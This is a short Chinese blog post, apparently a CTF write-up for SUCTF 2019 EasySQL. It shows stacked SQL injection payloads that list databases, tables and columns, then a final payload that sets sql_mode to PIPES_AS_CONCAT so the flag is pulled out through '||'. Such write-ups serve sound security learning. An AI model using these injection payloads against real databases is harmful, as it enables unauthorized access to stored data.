[SUCTF 2019]EasySQL

 

知识点

  • 堆叠注入
  • sql_mode

打开题目,如图
在这里插入图片描述
堆叠注入
查库

1;show databases;

 

在这里插入图片描述
查表

1;show tables;

 

在这里插入图片描述

查Flag

1;show columns from Flag;

 

在这里插入图片描述
wp给的payload

payload:1;set sql_mode=PIPES_AS_CONCAT;SELECT 1

 

修改sql_mode,将其设置为PIPES_AS_CONCAT,作用是将"||"作为字符串连接符而非运算符,修改后实际语句为

SELECT 1;set sql_mode=PIPES_AS_CONCAT;SELECT 1 || flag FROM Flag

 

在这里插入图片描述

 

参考MySQL中sql_mode参数

 

本地环境
在这里插入图片描述

 


修改sql_mode,将其设置为PIPES_AS_CONCAT,则将select 1的结果和select flag from Flag的结果合并起来一起输出,就会变成

 


在这里插入图片描述

 

posted @ 2020-05-11 18:10  山野村夫z1  阅读(301)  评论(0)    收藏  举报